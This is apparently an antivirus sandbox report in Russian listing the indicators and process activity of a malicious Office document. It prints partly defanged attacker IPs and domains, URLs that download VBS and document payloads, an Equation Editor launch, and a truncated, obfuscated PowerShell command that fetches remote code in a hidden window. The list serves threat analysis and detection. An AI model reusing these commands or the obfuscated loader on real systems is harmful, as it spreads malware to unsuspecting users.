Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\system_rootts.vbs"
- %TEMP%\system_rootts.vbs
- '19#.#.243.146':80
- 'cd#.#ixelbin.io':443
- http://19#.#.243.146/hcls/2/FeeeeeeeeeeeeeeFeeeeeeeeeeeeeeeeeee%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23FeeeeeeeeeeeeeeeeeeeFeEEEEEEEEEE.dOC
- http://19#.#.243.146/hcls/IBM/system.vbs
- 'cd#.#ixelbin.io':443
- DNS ASK cd#.#ixelbin.io
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBm⁂Gw⁂YQB0⁂C0⁂dwBh⁂HY⁂ZQ⁂t⁂GY⁂Mw⁂3⁂D⁂⁂Ng⁂w⁂C8⁂bwBy⁂Gk⁂ZwBp⁂G4⁂YQBs⁂...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBm⁂Gw⁂YQB0⁂C0⁂dwBh⁂HY⁂ZQ⁂t⁂GY⁂Mw⁂3⁂D⁂⁂Ng⁂w⁂C8⁂bwBy⁂Gk⁂ZwBp⁂G4⁂YQBs⁂...